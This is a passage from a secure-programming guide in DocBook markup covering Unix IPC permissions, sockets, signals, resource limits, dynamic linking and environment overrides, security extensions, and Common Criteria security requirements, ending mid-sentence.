creator UID and GID - UID and GID of the creator of the object.
</para>
</listitem>
<listitem>

<para>
owning UID and GID - UID and GID of the owner of the
object (initially equal to the creator UID).
</para>
</listitem>

</itemizedlist>

</para>

<para>
When accessing such objects, the rules are as follows:

<itemizedlist>
<listitem>

<para>
if the process has root privileges, the access is granted.
</para>
</listitem>
<listitem>

<para>
if the process' EUID is the owner or creator UID of the object,
then the appropriate creator permission bit is
checked to see if access is granted.
</para>
</listitem>
<listitem>

<para>
if the process' EGID is the owner or creator GID of the object,
or one of the process' groups is the owning or creating GID of the object,
then the appropriate creator group permission bit is checked for access.
</para>
</listitem>
<listitem>

<para>
otherwise, the appropriate ``other'' permission bit is checked
for access.
</para>
</listitem>

</itemizedlist>

</para>

<para>
Note that root, or a process with the EUID of either the owner or creator,
can set the owning UID and owning GID and/or remove the object.
More information is available in ipc(5).
</para>

</sect1>

<sect1 id="sockets">
<title>Sockets and Network Connections</title>

<para>
<!-- Sockets are supported by System V according to Linux's socket(2) -->
Sockets are used for communication, particularly over a network.
Sockets were originally developed by the
BSD branch of Unix systems, but they are generally portable to other
Unix-like systems: Linux and System V variants support sockets as well, and
socket support is required by the Open Group's
Single Unix Specification [Open Group 1997].
System V systems traditionally used a different (incompatible) network
communication interface, but it's worth noting that systems like Solaris
include support for sockets.
Socket(2) creates an endpoint for communication and returns a descriptor,
in a manner similar to open(2) for files.
The parameters for socket specify the protocol family and type,
such as the Internet domain (TCP/IP version 4), Novell's IPX,
or the ``Unix domain''.
A server then typically calls bind(2), listen(2), and accept(2) or select(2).
A client typically calls bind(2) (though that may be omitted) and
connect(2).
See these routine's respective man pages for more information.
It can be difficult to understand how to use sockets from their man pages;
you might want to consult other papers such as
Hall "Beej" [1999]
to learn how these calls are used together.
</para>

<para>
The ``Unix domain sockets'' don't actually represent a network protocol; they
can only connect to sockets on the same machine.
(at the time of this writing for the standard Linux kernel).
When used as a stream, they are fairly similar to named pipes, but with
significant advantages.
In particular, Unix domain socket is connection-oriented; each new connection to
the socket results in a new communication channel, a very different situation
than with named pipes.
Because of this property, Unix domain sockets are often used instead of
named pipes to implement IPC for many important services.
Just like you can have unnamed pipes, you can have unnamed Unix domain sockets
using socketpair(2); unnamed Unix domain sockets
are useful for IPC in a way similar to unnamed pipes.
</para>

<para>
There are several interesting security implications of Unix domain sockets.
First, although Unix domain sockets can appear in the filesystem and can have
stat(2) applied to them, you can't use open(2) to open them (you have
to use the socket(2) and friends interface).
Second, Unix domain sockets can be used to pass
file descriptors between processes (not just the file's contents).
This odd capability, not available in any other IPC mechanism, has been used
to hack all sorts of schemes (the descriptors can basically
be used as a limited version of the
``capability'' in the computer science sense of the term).
File descriptors are sent using sendmsg(2), where the msg (message)'s
field msg&lowbar;control points to an array of control message headers
(field msg&lowbar;controllen must specify the number of bytes contained in the array).
Each control message is a struct cmsghdr followed by data, and for this purpose
you want the cmsg&lowbar;type set to SCM&lowbar;RIGHTS.
A file descriptor is retrieved through recvmsg(2) and then tracked down in
the analogous way.
Frankly, this feature is quite baroque, but it's worth knowing about.
</para>

<para>
Linux 2.2 and later
supports an additional feature in Unix domain sockets: you can
acquire the peer's ``credentials'' (the pid, uid, and gid).
Here's some sample code:
<programlisting width="61">
<![CDATA[
 /* fd= file descriptor of Unix domain socket connected
    to the client you wish to identify */

 struct ucred cr;
 int cl=sizeof(cr);

 if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cr, &cl)==0) {
   printf("Peer's pid=%d, uid=%d, gid=%d\n",
           cr.pid, cr.uid, cr.gid);
]]>
</programlisting>
</para>

<para>
Standard Unix convention is that binding to
TCP and UDP local port numbers less than 1024 requires
root privilege, while any process can bind to an unbound port number
of 1024 or greater.
Linux follows this convention,
more specifically, Linux requires a process to have the
capability CAP&lowbar;NET&lowbar;BIND&lowbar;SERVICE to bind to a port number less than 1024;
this capability is normally only held by processes with an EUID of 0.
The adventurous can check this in Linux by examining its Linux's source;
in Linux 2.2.12, it's file <filename>/usr/src/linux/net/ipv4/af&lowbar;inet.c</filename>,
function inet&lowbar;bind().
</para>

</sect1>

<sect1 id="signals">
<title>Signals</title>

<para>
Signals are a simple form of ``interruption'' in the Unix-like OS world,
and are an ancient part of Unix.
A process can set a ``signal'' on another process (say using
kill(1) or kill(2)), and that other process would receive and
handle the signal asynchronously.
For a process to have permission to send an arbitrary
signal to some other process,
the sending process must either have root privileges, or
the real or effective user ID of the sending process
must equal the real or saved set-user-ID of the receiving process.
However, some signals can be sent in other ways.
In particular, SIGURG can be delivered over a network through the
TCP/IP out-of-band (OOB) message.
</para>

<para>
Although signals are an ancient part of Unix, they've had different
semantics in different implementations.
Basically, they involve questions such as ``what happens when a signal
occurs while handling another signal''?
The older Linux libc 5 used a different set of semantics for some signal
operations than the newer GNU libc libraries.
Calling C library functions is often unsafe within a
signal handler, and even some system calls aren't safe;
you need to examine the documentation for each call you make to see
if it promises to be safe to call inside a signal.
For more information, see the glibc FAQ (on some systems a local
copy is available at <filename>/usr/doc/glibc-*/FAQ</filename>).
</para>

<para>
For new programs, just use the POSIX signal system
(which in turn was based on BSD work); this set is widely supported
and doesn't have some of the problems
that some of the older signal systems did.
The POSIX signal system is based on using the sigset&lowbar;t datatype,
which can
be manipulated through a set of operations: sigemptyset(),
sigfillset(), sigaddset(), sigdelset(), and sigismember().
You can read about these in sigsetops(3).
Then use sigaction(2), sigprocmask(2),
sigpending(2), and sigsuspend(2) to set up an manipulate signal handling
(see their man pages for more information).
</para>

<para>
In general, make any signal handlers very short and simple, and
look carefully for race conditions.
Signals, since they are by nature asynchronous,
can easily cause race conditions.
</para>

<para>
A common convention exists for servers: if you receive SIGHUP, you should
close any log files, reopen and reread configuration files, and then
re-open the log files.
This supports reconfiguration without halting the server and
log rotation without data loss.
If you are writing a server where this convention makes sense,
please support it.
</para>

<para>
Michal Zalewski [2001] has written an excellent tutorial on how
signal handlers are exploited, and has recommendations for how to
eliminate signal race problems.
I encourage looking at his summary for more information; here are
my recommendations, which are similar to Michal's work:
<itemizedlist>
<listitem><para>
Where possible, have your signal handlers unconditionally set a specific flag
and do nothing else.
</para></listitem>
<listitem><para>
If you must have more complex signal handlers,
use only calls specifically designated as being safe for use
in signal handlers.
In particular,
don't use malloc() or free() in C (which on most systems
aren't protected against signals), nor the many functions that depend on them
(such as the printf() family and syslog()).
You could try to ``wrap'' calls to insecure library calls with a check
to a global flag (to avoid re-entry), but I wouldn't recommend it.
</para></listitem>
<listitem><para>
Block signal delivery during all non-atomic operations in the program, and
block signal delivery inside signal handlers.
</para></listitem>
</itemizedlist>
</para>

</sect1>

<sect1 id="quotas">
<title>Quotas and Limits</title>

<para>
Many Unix-like systems have
mechanisms to support filesystem quotas and process resource limits.
This certainly includes Linux.
These mechanisms are particularly useful for preventing denial of service
attacks; by limiting the resources available to each user, you can make
it hard for a single user to use up all the system resources.
Be careful with terminology here, because both filesystem quotas
and process resource limits have ``hard'' and
``soft'' limits but the terms mean slightly different things.
</para>

<para>
You can define storage (filesystem) quota limits on each mountpoint
for the number of blocks of storage and/or the number of unique files
(inodes) that can be used, and you can set such limits for a given user
or a given group.
A ``hard'' quota limit is a never-to-exceed limit, while a
``soft'' quota can be temporarily exceeded.
See quota(1), quotactl(2), and quotaon(8).
</para>

<para>
The rlimit mechanism supports a large number of process quotas, such as
file size, number of child processes, number of open files, and so on.
There is a ``soft'' limit (also called the current limit) and a
``hard limit'' (also called the upper limit).
The soft limit cannot be exceeded at any time, but through calls it can
be raised up to the value of the hard limit.
See getrlimit(2), setrlimit(2), and getrusage(2), sysconf(3), and
ulimit(1).
Note that there are several ways to set these limits, including the
PAM module pam&lowbar;limits.
</para>

</sect1>

<sect1 id="dlls">
<title>Dynamically Linked Libraries</title>

<para>
Practically all programs depend on libraries to execute.
In most modern Unix-like systems, including Linux,
programs are by default compiled to use <emphasis remap="it">dynamically linked libraries</emphasis>
(DLLs).
That way, you can update a library and all the programs using that library
will use the new (hopefully improved) version if they can.
</para>

<para>
Dynamically linked libraries are typically placed in one a few special
directories. The usual directories include
<filename>/lib</filename>, <filename>/usr/lib</filename>, <filename>/lib/security</filename>
for PAM modules,
<filename>/usr/X11R6/lib</filename> for X-windows, and <filename>/usr/local/lib</filename>.
You should use these standard conventions in your programs, in particular,
except during debugging you shouldn't use value computed from the
current directory as a source for dynamically linked libraries (an
attacker may be able to add their own choice ``library'' values).
</para>

<para>
There are special conventions for naming libraries and having symbolic
links for them, with the result that you can update libraries and still
support programs that want to use old, non-backward-compatible versions
of those libraries.
There are also ways to override specific libraries or even just
specific functions in a library when executing a particular program.
This is a real advantage of Unix-like systems over
Windows-like systems; I believe Unix-like systems have a much better system
for handling library updates, one reason that Unix and Linux systems are reputed
to be more stable than Windows-based systems.
</para>

<para>
On GNU glibc-based systems, including all Linux systems,
the list of directories automatically searched during program start-up is
stored in the file /etc/ld.so.conf.
Many Red Hat-derived distributions don't normally
include <filename>/usr/local/lib</filename>
in the file <filename>/etc/ld.so.conf</filename>.
I consider this a bug, and adding <filename>/usr/local/lib</filename> to
<filename>/etc/ld.so.conf</filename>
is a common ``fix'' required to run many programs on Red Hat-derived systems.
If you want to just override a few functions in a library, but keep the
rest of the library, you can enter the names of overriding libraries
(.o files) in <filename>/etc/ld.so.preload</filename>;
these ``preloading'' libraries will take precedence over the standard set.
This preloading file is typically used for emergency patches;
a distribution usually won't include such a file when delivered.
Searching all of these directories at program start-up would be too
time-consuming, so a caching arrangement is actually used.
The program ldconfig(8) by default reads in the file /etc/ld.so.conf,
sets up the appropriate symbolic links in the dynamic link directories
(so they'll follow the standard conventions),
and then writes a cache to /etc/ld.so.cache that's then used by other
programs.
So, ldconfig has to be run whenever a DLL is added, when a DLL is removed,
or when the set of DLL directories changes; running ldconfig is often
one of the steps performed by package managers
when installing a library.
On start-up, then, a program uses the dynamic loader to
read the file /etc/ld.so.cache and then load the libraries it needs.
</para>

<para>
Various environment variables can control this process, and in fact
there are environment variables that permit you to
override this process (so, for example, you can temporarily
substitute a different library for this particular execution).
In Linux,
the environment variable
LD&lowbar;LIBRARY&lowbar;PATH is a colon-separated set of directories where libraries
are searched for first, before the standard set of directories;
this is useful when debugging a new library or using a nonstandard
library for special purposes, but be sure you trust those who can
control those directories.
The variable LD&lowbar;PRELOAD lists object files with functions that override
the standard set, just as /etc/ld.so.preload does.
The variable LD&lowbar;DEBUG, displays debugging information; if set
to ``all'', voluminous information about the dynamic linking process
is displayed while it's occurring.
</para>

<para>
Permitting user control over dynamically linked libraries
would be disastrous for setuid/setgid programs if special measures
weren't taken.
Therefore, in the GNU glibc implementation, if the program is setuid or setgid
these variables (and other similar variables) are ignored or greatly
limited in what they can do.
The GNU glibc library determines if a program is setuid or setgid
by checking the program's credentials;
if the UID and EUID differ, or the GID and the EGID differ, the
library presumes the program is setuid/setgid (or descended from one)
and therefore greatly limits its abilities to control linking.
If you load the GNU glibc libraries, you can see this; see especially
the files elf/rtld.c and sysdeps/generic/dl-sysdep.c.
This means that if you cause the UID and GID to equal the EUID and EGID,
and then call a program, these variables will have full effect.
Other Unix-like systems handle the situation differently but for the
same reason: a setuid/setgid program should not be unduly affected
by the environment variables set.
Note that graphical user interface toolkits generally do permit
user control over dynamically linked libraries, because
executables that directly invoke graphical user inteface toolkits
should never, ever, be setuid (or have other special privileges) at all.
For more about how to develop secure GUI applications, see
<xref linkend="minimize-privileged-modules">.
</para>

<para>
For Linux systems, you can get more information from my document, the
<ulink url="http://www.dwheeler.com/program-library"><emphasis>Program Library HOWTO</emphasis></ulink>.
</para>

</sect1>

<sect1 id="audit">
<title>Audit</title>

<para>
Different Unix-like systems handle auditing differently.
In Linux, the most common ``audit'' mechanism is syslogd(8), usually working
in conjunction with klogd(8).
You might also want to look at wtmp(5), utmp(5), lastlog(8), and acct(2).
Some server programs (such as the Apache web server)
also have their own audit trail mechanisms.
According to the FHS, audit logs should be stored in /var/log or its
subdirectories.
</para>

</sect1>

<sect1 id="pam">
<title>PAM</title>

<para>
Sun Solaris and nearly all Linux systems use the
Pluggable Authentication Modules (PAM) system for authentication.
PAM permits run-time configuration of authentication methods
(e.g., use of passwords, smart cards, etc.).
See <xref linkend="use-pam"> for more information on using PAM.
</para>

</sect1>

<sect1 id="unix-extensions">
<title>Specialized Security Extensions for Unix-like Systems</title>

<para>
A vast amount of research and development has gone into
extending Unix-like systems to support security needs of various
communities.
For example, several Unix-like systems have been extended to support the
U.S. military's desire for multilevel security.
If you're developing software, you should try to design your software
so that it can work within these extensions.
</para>

<para>
FreeBSD has a new system call,
<ulink url="http://docs.freebsd.org/44doc/papers/jail/jail.html">jail(2)</ulink>.
The jail system call supports sub-partitioning an environment
into many virtual machines (in a sense, a ``super-chroot'');
its most popular use has been to provide
virtual machine services for Internet Service Provider environments.
Inside a jail, all processes (even those owned by root)
have the scope of their requests limited to the jail.
When a FreeBSD system is booted up after a fresh install,
no processes will be in jail.
When a process is placed in a jail, it, and any descendants of
that process created will be in that jail.
Once in a jail,
access to the file name-space is restricted in the style of chroot(2)
(with typical chroot escape routes blocked),
the ability to bind network resources is limited to a specific IP address,
the ability to manipulate system resources and perform privileged operations
is sharply curtailed, and the ability to interact with other processes
is limited to only processes inside the same jail.
Note that each jail is bound to a single IP address;
processes within the jail may not make use of any other IP
address for outgoing or incoming connections.
</para>

<para>
Some extensions available in Linux, such as POSIX capabilities and
special mount-time options, have already been discussed.
Here are a few of these efforts for Linux systems for creating
restricted execution environments; there are many different approaches.
The U.S. National Security Agency (NSA) has developed
<ulink url="http://www.nsa.gov/selinux">Security-Enhanced Linux (Flask)</ulink>,
which supports defining a security policy in a specialized language
and then enforces that policy.
The <ulink url="http://medusa.fornax.sk">Medusa DS9</ulink>
extends Linux by supporting, at the kernel level,
a user-space authorization server.
<ulink url="http://www.lids.org">LIDS</ulink>
protects files and processes, allowing administrators to
``lock down'' their system.
The ``Rule Set Based Access Control'' system,
<ulink url="http://www.rsbac.de">RSBAC</ulink>
is based on the Generalized Framework for Access Control (GFAC)
by Abrams and LaPadula and provides a flexible system of access
control based on several kernel modules.
<ulink url="http://subterfugue.org">Subterfugue</ulink>
is a framework for ``observing and playing with the reality of software'';
it can intercept system calls and change their parameters
and/or change their return values to implement sandboxes, tracers,
and so on;
it runs under Linux 2.4 with no changes (it doesn't require
any kernel modifications).
<ulink url="http://www.cs.berkeley.edu/~daw/janus">Janus</ulink>
is a security tool for sandboxing untrusted applications
within a restricted execution environment.
Some have even used
<ulink url="http://user-mode-linux.sourceforge.net">User-mode Linux</ulink>,
which implements ``Linux on Linux'', as a sandbox implementation.
Because there are so many different approaches to implementing more
sophisticated security models, Linus Torvalds has requested that a
generic approach be developed so different security policies can be
inserted; for more information about this, see
<ulink url="http://mail.wirex.com/mailman/listinfo/linux-security-module">
http://mail.wirex.com/mailman/listinfo/linux-security-module</ulink>.
</para>
<para>
There are many other extensions for security on various Unix-like systems,
but these are really outside the scope of this document.
</para>
</sect1>

</chapter>


<chapter id="requirements">
<title>Security Requirements</title>

<epigraph>
<attribution>Job 5:24 (NIV)</attribution>
<para>
You will know that your tent is secure;
you will take stock of your property and find nothing missing.
</para>
</epigraph>

<para>
Before you can determine if a program is secure, you need to determine
exactly what its security requirements are.
Thankfully, there's an international standard for identifying and defining
security requirements that is useful for many such circumstances:
the Common Criteria [CC 1999], standardized as ISO/IEC 15408:1999.
The CC is the culmination of decades of work to identify
information technology security requirements.
There are other schemes for defining security requirements and evaluating
products to see if products meet the requirements,
such as NIST FIPS-140 for cryptographic equipment,
but these other schemes are generally focused on a
specialized area and won't be considered further here.
</para>

<para>
This chapter briefly describes the Common Criteria (CC) and how to use its
concepts to help you informally identify security requirements and
talk with others about security requirements using standard terminology.
The language of the CC is more precise, but it's also more formal and
harder to understand; hopefully the text in this section will help you
"get the jist".
</para>

<para>
Note that, in some circumstances, software cannot be used unless it
has undergone a CC evaluation by an accredited laboratory.
This includes certain kinds of uses in the U.S. Department of Defense
(as specified by NSTISSP Number 11, which requires that before some
products can be used they must be evaluated or enter evaluation),
and in the future such a requirement may
also include some kinds of uses for software in the U.S. federal government.
This section doesn't provide enough information
if you plan to actually go through a CC evaluation by an
accredited laboratory.
If you plan to go through a formal evaluation,
you need to read the real CC, examine various websites to really understand
the basics of the CC, and
eventually contract a lab accredited to do a CC evaluation.
</para>

<sect1>
<title>Common Criteria Introduction</title>

<para>
First, some general information about the CC will help understand
how to apply its concepts.
The CC's official name is
"The Common Criteria for Information Technology Security Evaluation",
though it's normally just called the Common Criteria.
The CC document has three parts:
the introduction (that describes the CC overall),
security functional requirements (that lists various kinds of security
functions that products might want to include),
and security assurance requirements (that lists various methods of
assuring that a product is secure).
There is also a related document, the
"Common Evaluation Methodology" (CEM),
that guides evaluators how to apply the CC when doing formal evaluations
(in particular, it amplifies what the CC means in certain cases).
</para>

<para>
Although the CC is International Standard ISO/IEC 15408:1999,
it is outrageously expensive to order the CC from ISO.
Hopefully someday ISO will follow the lead of other standards
organizations such as the IETF and the W3C, which freely redistribute
standards.
Not surprisingly, IETF and W3C standards are followed more often than
many ISO standards, in part because ISO's fees for standards simply
make them inaccessible to most developers.
(I don't mind authors being paid for their work, but ISO doesn't
fund most of the standards development work - indeed, many of the developers
of ISO documents are volunteers - so ISO's indefensible fees only line their
own pockets and don't actually aid the authors or users at all.)
Thankfully, the CC developers anticipated this problem and have made sure
that the CC's technical content is freely available to all;
you can download the CC's technical content from
<ulink
url="http://csrc.nist.gov/cc/ccv20/ccv2list.htm">http://csrc.nist.gov/cc/ccv20/ccv2list.htm</ulink>
Even those doing formal evaluation processes usually
use these editions of the CC, and not the ISO versions;
there's simply no good reason to pay ISO for them.
</para>

<para>
Although it can be used in other ways, the CC is typically
used to create two kinds of documents, a
``Protection Profile'' (PP) or a ``Security Target'' (ST).
A ``protection profile'' (PP) is a document created by group of users
(for example, a consumer group or large organization)
that identifies the desired security properties of a product.
Basically, a PP is a list of user security requirements,
described in a very specific way defined by the CC.
If you're building a product similar to other existing products, it's
quite possible that there are one or more PPs that define what some
users believe are necessary for that kind of product
(e.g., an operating system or firewall).
A ``security target'' (ST) is a document that identifies what a product
actually does, or a subset of it, that is security-relevant.
An ST doesn't need to meet the requirements of
any particular PP, but an ST could meet the requirements of one or more PPs.
</para>

<para>
Both PPs and STs can go through a formal evaluation.
An evaluation of a PP simply ensures that the PP meets various documentation
rules and sanity checks.
An ST evaluation involves not just examining the ST document,
but more importantly it involves evaluating an actual system
(called the ``target of evaluation'', or TOE).
The purpose of an ST evaluation is to ensure that, to the level of
the assurance requirements specified by the ST,
the actual product (the TOE) meets the ST's security functional requirements.
Customers can then compare evaluated STs to
PPs describing what they want.
Through this comparison, consumers can determine if the
products meet their requirements - and if not, where the limitations are.
</para>

<para>
To create a PP or ST, you go through a process of identifying the
security environment, namely, your
assumptions, threats, and relevant organizational
security policies (if any).
From the security environment, you derive
the security objectives for the product or product type.
Finally, the security requirements are selected so that
they meet the objectives.
There are two kinds of security requirements: functional requirements
(what a product has to be able to do), and assurance requirements
(measures to inspire confidence that the objectives have been met).
Actually creating a PP or ST is often not a simple straight line as
outlined here, but the final result needs to show a clear relationship so
that no critical point is easily overlooked.
Even if you don't plan to write an ST or PP,
the ideas in the CC can still be helpful;
the process of identifying the security environment, objectives, and
requirements is still helpful in identifying what's really important.
</para>

<para>
The vast majority of the CC's text is used to define standardized
functional requirements and assurance requirements.
In essence, the majority of the CC is a ``chinese menu'' of possible
security requirements that someone might want.
PP authors pick from the various options to describe what they want, and
ST authors pick from the options to describe what they provide.
</para>

<para>
Since many people might have difficulty identifying a reasonable set
of assurance requirements, so pre-created sets of assurance requirements
called ``evaluation assurance levels'' (EALs) have been defined, ranging
from 1 to 7.
EAL 2 is simply a standard shorthand for the set of assurance requirements
defined for EAL 2.
Products can add additional assurance measures, for example, they might
choose EAL 2 plus some additional assurance measures (if the combination
isn't enough to achieve a higher EAL level, such a combination would be
called "EAL 2 plus").
There are mutual recognition agreements signed between many of the
world's nations that will accept an evaluation done by
an accredited laboratory in the other countries as long as all of the
assurance measures taken were at the EAL 4 level or less.
</para>

<para>
If you want to actually write an ST or PP, there's an
open source software program that can help you, called the
``CC Toolbox''.
It can make sure that dependencies between requirements
are met, suggest common requirements, and help you quickly
develop a document, but it obviously can't do your thinking for you.
The specification of exactly what information
must be in a PP or ST are in CC part 1, annexes B and C respectively.
</para>

<para>
If you do decide to have your product (or PP) evaluated by
an accredited laboratory, be prepared to spend money, spend time,
and work throughout the process.
In particular, evaluations require paying an
accredited lab to do the evaluation, and higher levels of assurance
become rapidly more expensive.
Simply believing your product is secure isn't good enough; evaluators
will require evidence to justify any claims made.
Thus, evaluations require documentation, and usually the available
documentation has to be improved or developed
to meet CC requirements (especially at the higher assurance levels).
Every claim has to be justified to some level of confidence, so the more
claims made, the stronger the claims, and the
more complicated the design, the more expensive an evaluation is.
Obviously, when flaws are found, they will usually need to be fixed.
Note that a laboratory is paid to evaluate a product and determine the truth.
If the product doesn't meet its claims, then you basically have two
choices: fix the product, or change (reduce) the claims.
</para>

<para>
It's important to discuss with customers what's desired before beginning
a formal ST evaluation;
an ST that includes functional or assurance requirements
not truly needed by customers will
be unnecessarily expensive to evaluate, and an ST that omits
necessary requirements may not be acceptable to the customers
(because that necessary piece won't have been evaluated).
PPs identify such requirements, but make sure that the PP
accurately reflects the customer's real requirements (perhaps the customer
only wants a part of the functionality or assurance in the PP,
or has a different environment in mind, or wants something else instead
for the situations where your product will be used).
Note that an ST need not include every security feature in a product;
an ST only states what will be (or has been) evaluated.
A product that has a higher EAL rating is not necessarily more secure than a
similar product with a lower rating or no rating;
the environment might be different, the evaluation may have saved money and
time by not evaluating the other product at a higher level,
or perhaps the evaluation missed something important.
Evaluations are not proofs; they simply impose a defined minimum bar to
gain confidence in the requirements or product.
</para>

</sect1>

<sect1>
<title>Security Environment and Objectives</title>

<para>
The first step in defining a PP or ST is identify the
``security environment''.
This means that you have to consider the physical environment
(can attackers access the computer hardware?),
the assets requiring protection (files, databases, authorization
credentials, and so on),
and the purpose of the TOE (what kind of product is it? what is
the intended use?).
</para>

<para>
In developing a PP or ST, you'd end up with a statement of
assumptions (who is trusted? is the network or platform benign?),
threats (that the system or its environment must counter),
and organizational security policies (that the system or its environment
must meet).
A threat is characterized in terms of a threat agent
(who might perform the attack?), a presumed attack method,
any vulnerabilities that are the basis for the attack, and what asset
is under attack.
</para>

<para>
You'd then define a set of security objectives for the system
and environment, and show that those objectives counter the threats
and satisfy the policies.
Even if you aren't creating a PP or ST, thinking about your assumptions,
threats, and possible policies can help you avoid foolish decisions.
For example, if the computer network you're using can be sniffed
(e.g., the Internet), then unencrypted passwords are a foolish idea
in most circumstances.
</para>

<para>
For the CC, you'd then identify the functional and assurance requirements
that would be met by the TOE, and which ones would be met by the environment,
to meet those security objectives.
These requirements would be selected from the ``chinese menu'' of the CC's
possible requirements, and the next sections will briefly describe
the major classes of requirements.
In the CC, requirements are grouped into classes, which are subdivided into
families, which are further subdivided into components; the details of all this
are in the CC itself if you need to know about this.
A good diagram showing how this works is in the CC part 1, figure 4.5,
which I cannot reproduce here.
</para>

<para>
Again, if you're not intending for your product to undergo a CC evaluation,
it's still good to briefly determine this kind of information and informally
write include that information
in your documentation (e.g., the man page or whatever your documentation is).
</para>

</sect1>

<sect1>
<title>Security Functionality Requirements</title>
<para>
This section briefly describes the CC security functionality requirements
(by CC class),
primarily to give you an idea of the kinds of security requirements
you might want in your software.
If you want more detail about the CC's requirements, see CC part 2.
Here are the major classes of CC security requirements, along with
the 3-letter CC abbreviation for that class:
<itemizedlist>
<listitem><para>
Security Audit (FAU).
Perhaps you'll need to recognize, record, store, and analyze
security-relevant activities.
You'll need to identify what you want to make auditable, since
often you can't leave all possible auditing capabilities enabled.
Also, consider what to do when there's no room left for auditing -
if you stop the system, an attacker may intentionally do things to be logged
and thus stop the system.
</para></listitem>
<listitem><para>
Communication/Non-repudiation (FCO).
This class is poorly named in the CC; officially it's called
communication, but the real meaning is non-repudiation.
Is it important that an originator cannot deny having sent a message, or
that a recipient cannot deny having received it?
There are limits to how well technology itself can support
non-repudiation (e.g., a user might be able to give their private key away
ahead of time if they wanted to be able to repudiate something later),
but nevertheless for some applications supporting non-repudiation
capabilities is very useful.
</para></listitem>
<listitem><para>
Cryptographic Support (FCS).
If you're using cryptography, what operations use cryptography,
what algorithms and key sizes are you using, and how are you managing
their keys (including distribution and destruction)?
</para></listitem>
<listitem><para>
User Data Protection (FDP).
This class specifies requirement for protecting user data, and is a big
class in the CC with many families inside it.
The basic idea is that you should specify a policy for data
(access control or information flow rules),
develop various means to implement the policy,
possibly support off-line storage, import, and export, and
provide integrity when transferring user data between TOEs.
One often-forgotten issue is residual information protection - is it
acceptable if an attacker can later recover ``deleted'' data?
</para></listitem>
<listitem><para>
Identification and authentication (FIA).
Generally you don't just want a user to report who they are
(identification) - you need to verify their identity, a process
called authentication.
Passwords are the most common mechanism for authentication.
It's often useful to limit the number of authentication attempts
(if you can) and limit the feedback during authentication
(e.g., displaying asterisks instead of the actual password).
Certainly, limit what a user can do before authenticating; in many cases,
don't let the user do anything without authenticating.
There may be many issues controlling when a session can start, but in the CC
world this is handled by the "TOE access" (FTA) class described below instead.
</para></listitem>
<listitem><para>
Security Management (FMT).
Many systems will require some sort of management (e.g., to
control who can do what), generally by those who are given a more
trusted role (e.g., administrator).
Be sure you think through what those special operations are, and ensure that
only those with the trusted roles can invoke them.
You want to limit trust; ideally, even more trusted roles should be limited
in what they can do.
</para></listitem>
<listitem><para>
Privacy (FPR).
Do you need to support anonymity, pseudonymity, unlinkability,
or unobservability?
If so, are there conditions where you want or don't want these
(e.g., should an administrator be able to determine the real identity
of someone hiding behind a pseudonym?).
Note that these can seriously conflict with
non-repudiation, if you want those too.
If you're worried about sophisticated threats, these functions
can be hard to provide.
</para></listitem>
<listitem><para>
Protection of the TOE Security Functions/Self-protection (FPT).
Clearly, if the TOE can be subverted, any security functions it provides
aren't worthwhile, and in many cases a TOE has to provide at least some
self-protection.
Perhaps you should "test the underlying abstract machine" - i.e., test
that the underlying components meet your assumptions,
or have the product run self-tests
(say during start-up, periodically, or on request).
You should probably "fail secure", at least under certain conditions;
determine what those conditions are.
Consider phyical protection of the TOE.
You may want some sort of secure recovery function after a failure.
It's often useful to have replay detection (detect when an attacker is
trying to replay older actions) and counter it.
Usually a TOE must make sure that any access checks are
always invoked and actually succeed before performing a restricted action.
</para></listitem>
<listitem><para>
Resource Utilization (FRU).
Perhaps you need to provide fault tolerance,
a priority of service scheme, or support
resource allocation (such as a quota system).
</para></listitem>
<listitem><para>
TOE Access (FTA).
There may be many issues controlling sessions.
Perhaps there should be a limit on the number of concurrent sessions
(if you're running a web service, would it make sense for the same user
to be logged in simultaneously, or from two different machines?).
Perhaps you should lock or terminate a session automatically
(e.g., after a timeout), or let users initiate a session lock.
You might want to include a standard warning banner.
One surprisingly useful piece of information is displaying, on login,
information about the last session (e.g., the date/time and location of the
last login) and the date/time of the
last unsuccessful attempt - this gives users information
that can help them detect interlopers.
Perhaps sessions can only be established based on other criteria
(e.g., perhaps you can only use the program during business hours).
</para></listitem>
<listitem><para>
Trusted path/channels (FTP).
A common trick used by attackers is to make the screen appear to be
something it isn't, e.g., run an ordinary program that looks like a
login screen or a forged web site.
Thus, perhaps there needs to be a "trusted path" - a way that users
can ensure that they are talking to the "real" program.
</para></listitem>
</itemizedlist>


</para>
</sect1>

<sect1>
<title>Security Assurance Measure Requirements</title>
<para>
As noted above, the CC has a set of possible assurance requirements that
can be selected, and several predefined sets of assurance requirements
(EAL levels 1 through 7).
Again, if you're actually going to go through a CC evaluation, you
should examine the CC documents; I'll skip describing the measures
involving reviewing official CC documents (evaluating PPs and STs).
Here are some assurance measures that can increase the confidence
others have in your software:
<itemizedlist>
<listitem><para>
Configuration management (ACM).
At least, have unique a version identifier for each TOE release, so that
users will know what they have.
You gain more assurance if you have good automated tools to control
your software, and have separate version identifiers for each piece
(typical CM tools like CVS can do this, although CVS doesn't record
changes as atomic changes which is a weakness of it).
The more that's under configuration management, the better;
don't just control your code, but also control documentation,
track all problem reports (especially security-related ones),
and all development tools.
</para></listitem>
<listitem><para>
Delivery and operation (ADO).
Your delivery mechanism should ideally let users detect unauthorized
modifications to prevent someone else masquerading as the developer, and
even better, prevent modification in the first place.
You should provide documentation on how to securely install, generate,
and start-up the TOE, possibly generating a log describing how the TOE
was generated.
</para></listitem>
<listitem><para>
Development (ADV).
These CC requirements deal with documentation describing the TOE
implementation, and that they need to be consistent between each other
(e.g., the information in the ST, functional specification, high-level
design, low-level design, and code, as well as any models of the
security policy).
</para></listitem>
<listitem><para>
Guidance documents (AGD).
Users and administrators of your product will probably need some
sort of guidance to help them use it correctly.
It doesn't need to be on paper; on-line help and "wizards" can help too.
The guidance should include warnings about actions that may be
a problem in a secure environemnt, and describe how to use the system
securely.
</para></listitem>
<listitem><para>
Life-cycle support (ALC).
This includes development security (securing the systems being used
for development, including physical security),
a flaw remediation process (to track and correct all security flaws),
and selecting development tools wisely.
</para></listitem>
<listitem><para>
Tests (ATE).
Simply testing can help, but remember that you need to test the
security functions and not just general functions.
You should check if something is set to permit, it's permitted, and
if it's forbidden, it is no longer permitted.
Of course, there may be clever ways to subvert this, which is what
vulnerability assessment is all about (described next).
</para></listitem>
<listitem><para>
Vulnerability Assessment (AVA).
Doing a vulnerability analysis is useful, where
someone pretends to be an attacker and tries to find vulnerabilities
in the product using the available information, including documentation
(look for "don't do X" statements and see if an attacker could exploit them)
and publicly known past vulnerabilities of this or similar products.
This book describes various ways of countering known vulnerabilities of
previous products to problems such as replay attacks (where known-good
information is stored and retransmitted), buffer overflow attacks,
